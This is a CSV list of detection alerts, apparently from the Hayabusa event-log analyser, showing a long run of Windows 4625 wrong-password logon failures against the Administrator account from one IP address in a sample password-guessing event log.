2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
